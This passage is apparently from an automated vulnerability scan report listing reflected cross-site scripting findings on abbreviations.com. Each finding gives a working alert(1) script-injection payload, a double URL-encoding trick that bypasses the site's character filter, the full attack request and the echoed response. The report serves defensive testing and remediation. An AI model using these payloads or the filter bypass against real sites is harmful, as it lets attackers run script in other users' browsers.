Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:28:20 GMT
Connection: close
Content-Length: 27130


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>480139ed9b";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "random.aspx7bde3<script>alert(1)</script>480139ed9b" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "random.aspx7bde3<script>
...[SNIP]...

4.451. http://www.abbreviations.com/random.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /random.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload a3e63%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e029e9681aa3 was submitted in the REST URL parameter 1. This input was echoed as a3e63</title><script>alert(1)</script>029e9681aa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /random.aspxa3e63%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e029e9681aa3 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:29:45 GMT
Connection: close
Content-Length: 27357


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does random.aspxa3e63</title><script>alert(1)</script>029e9681aa3 stand for?</title>
...[SNIP]...

4.452. http://www.abbreviations.com/random.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /random.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0199%2522%253balert%25281%2529%252f%252fdc2600d1a53 was submitted in the REST URL parameter 1. This input was echoed as d0199";alert(1)//dc2600d1a53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /random.aspxd0199%2522%253balert%25281%2529%252f%252fdc2600d1a53 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:27:19 GMT
Connection: close
Content-Length: 26825


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "random.aspxd0199";alert(1)//dc2600d1a53";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "random.aspxd0199";alert(1)//dc2600d1a53" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.hr
...[SNIP]...

4.453. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8b29%2522%253balert%25281%2529%252f%252f3fbc9a897bd was submitted in the REST URL parameter 1. This input was echoed as c8b29";alert(1)//3fbc9a897bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchAmazon.aspxc8b29%2522%253balert%25281%2529%252f%252f3fbc9a897bd HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:29:07 GMT
Connection: close
Content-Length: 26968


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "searchAmazon.aspxc8b29";alert(1)//3fbc9a897bd";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "searchAmazon.aspxc8b29";alert(1)//3fbc9a897bd" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.locat
...[SNIP]...

4.454. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81f14%253cscript%253ealert%25281%2529%253c%252fscript%253e1dcba33aba9 was submitted in the REST URL parameter 1. This input was echoed as 81f14<script>alert(1)</script>1dcba33aba9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchAmazon.aspx81f14%253cscript%253ealert%25281%2529%253c%252fscript%253e1dcba33aba9 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:30:35 GMT
Connection: close
Content-Length: 27304


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>1dcba33aba9";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "searchAmazon.aspx81f14<script>alert(1)</script>1dcba33aba9" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "searchAmazon.aspx81f14<script>
...[SNIP]...

4.455. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 12886%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e65482f9cb43 was submitted in the REST URL parameter 1. This input was echoed as 12886</title><script>alert(1)</script>65482f9cb43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchAmazon.aspx12886%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e65482f9cb43 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:32:50 GMT
Connection: close
Content-Length: 27554


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does searchAmazon.aspx12886</title><script>alert(1)</script>65482f9cb43 stand for?</title>
...[SNIP]...

4.456. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de701%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9e42a89191 was submitted in the REST URL parameter 1. This input was echoed as de701"><script>alert(1)</script>e9e42a89191 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchAmazon.aspxde701%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9e42a89191 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:28:43 GMT
Connection: close
Content-Length: 27373


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does searchAmazon.aspxde701"><script>alert(1)</script>e9e42a89191 stand for?, What does searchAmazon.aspxde701">
...[SNIP]...

4.457. http://www.abbreviations.com/searchAmazon.aspx [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e03"%3balert(1)//fb56f9bdb1a was submitted in the st parameter. This input was echoed as 55e03";alert(1)//fb56f9bdb1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchAmazon.aspx?st=55e03"%3balert(1)//fb56f9bdb1a HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:22:56 GMT
Connection: close
Content-Length: 27124

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

.resp {padding:0px;
...[SNIP]...
<script>
function Filter(cat)
{
   URL = "searchamazon.aspx?st=" + "55e03";alert(1)//fb56f9bdb1a" + "&cat=" + cat;
window.location.href = URL;
}
</script>
...[SNIP]...

4.458. http://www.abbreviations.com/searchAmazon.aspx [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 9c244<script>alert(1)</script>f6f6f282acc was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchAmazon.aspx?st=9c244<script>alert(1)</script>f6f6f282acc HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:23:16 GMT
Connection: close
Content-Length: 27371

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

.resp {padding:0px;
...[SNIP]...
<span style="color:#000055;font-weight:bold;font-style:italic;">9c244<script>alert(1)</script>f6f6f282acc</span>
...[SNIP]...

4.459. http://www.abbreviations.com/searchAmazon.aspx [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as text between TITLE tags. The payload 16b98</title><script>alert(1)</script>ea6b04fea67 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchAmazon.aspx?st=16b98</title><script>alert(1)</script>ea6b04fea67 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:23:18 GMT
Connection: close
Content-Length: 27523

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

.resp {padding:0px;
...[SNIP]...
<title>What does 16b98</title><script>alert(1)</script>ea6b04fea67 stand for?</title>
...[SNIP]...

4.460. http://www.abbreviations.com/searchAmazon.aspx [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9142f"><script>alert(1)</script>d31baaf031c was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchAmazon.aspx?st=9142f"><script>alert(1)</script>d31baaf031c HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:22:45 GMT
Connection: close
Content-Length: 27409

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

.resp {padding:0px;
...[SNIP]...
<meta name="keywords" content="What does 9142f"><script>alert(1)</script>d31baaf031c stand for?, What does 9142f">
...[SNIP]...

4.461. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchgoogle.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 6fe0e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34856c7ba54 was submitted in the REST URL parameter 1. This input was echoed as 6fe0e</title><script>alert(1)</script>34856c7ba54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchgoogle.aspx6fe0e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34856c7ba54?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:43:06 GMT
Connection: close
Content-Length: 27628


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does searchgoogle.aspx6fe0e</title><script>alert(1)</script>34856c7ba54?st= stand for?</title>
...[SNIP]...

4.462. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchgoogle.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9deee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb2e9cafcbb0 was submitted in the REST URL parameter 1. This input was echoed as 9deee"><script>alert(1)</script>b2e9cafcbb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchgoogle.aspx9deee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb2e9cafcbb0?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:38:26 GMT
Connection: close
Content-Length: 27481


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does searchgoogle.aspx9deee"><script>alert(1)</script>b2e9cafcbb0?st= stand for?, What does searchgoogle.aspx9deee">
...[SNIP]...

4.463. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchgoogle.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d7e60%253cscript%253ealert%25281%2529%253c%252fscript%253e4a356520f9b was submitted in the REST URL parameter 1. This input was echoed as d7e60<script>alert(1)</script>4a356520f9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchgoogle.aspxd7e60%253cscript%253ealert%25281%2529%253c%252fscript%253e4a356520f9b?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:41:11 GMT
Connection: close
Content-Length: 27446


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>4a356520f9b?st=";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "searchgoogle.aspxd7e60<script>alert(1)</script>4a356520f9b?st=" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "searchgoogle.aspxd7e60<script>
...[SNIP]...

4.464. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchgoogle.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6035c%2522%253balert%25281%2529%252f%252fbcb3780252b was submitted in the REST URL parameter 1. This input was echoed as 6035c";alert(1)//bcb3780252b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchgoogle.aspx6035c%2522%253balert%25281%2529%252f%252fbcb3780252b?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

